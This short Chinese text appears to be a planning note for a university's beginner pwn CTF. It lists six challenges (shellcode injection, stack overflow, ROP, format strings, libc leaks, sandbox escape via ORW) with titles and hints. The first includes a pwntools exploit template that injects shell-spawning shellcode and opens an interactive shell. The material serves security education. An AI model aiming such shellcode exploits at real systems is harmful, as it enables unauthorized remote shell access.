pwn出题，北京交通大学：
1、入门指南签到，test your nc，注入shellcode
标题：PWN入门指北
内容：
拿完flag不要走啊！给你个任务，把CTFPWN的环境配置好，再把exp每一句给搞懂。
EXP框架：
----------------------------------------------------------------
from pwn import *
context(arch = 'i386',log_level = 'debug', os = 'linux')
io = process('./pwn1')
#io = remote("ip", port)
shellcode = asm(shellcraft.sh())
io.sendline(shellcode) 
#io.recv() 
io.interactive()  
----------------------------------------------------------------

2、栈溢出入门
标题：Stack_Overf10w
内容：什么是Stack_Overf10w？原理是什么？


3、ROPgadget入门
标题：是ROP不是Rapper！！
内容：上一题学的懂吗？这题记得栈对齐(⊙o⊙)


4、fmt
标题：格式化字符串
内容：这题和Stack_Overf10w毫不相干。


5、泄漏libc
标题：你的libc漏了。
内容：你可别被IDA坑了。

6、沙箱逃逸
标题：会逃跑的沙箱
内容：可以尝试用 ORW 读 flag；flag 文件位置为 /flag。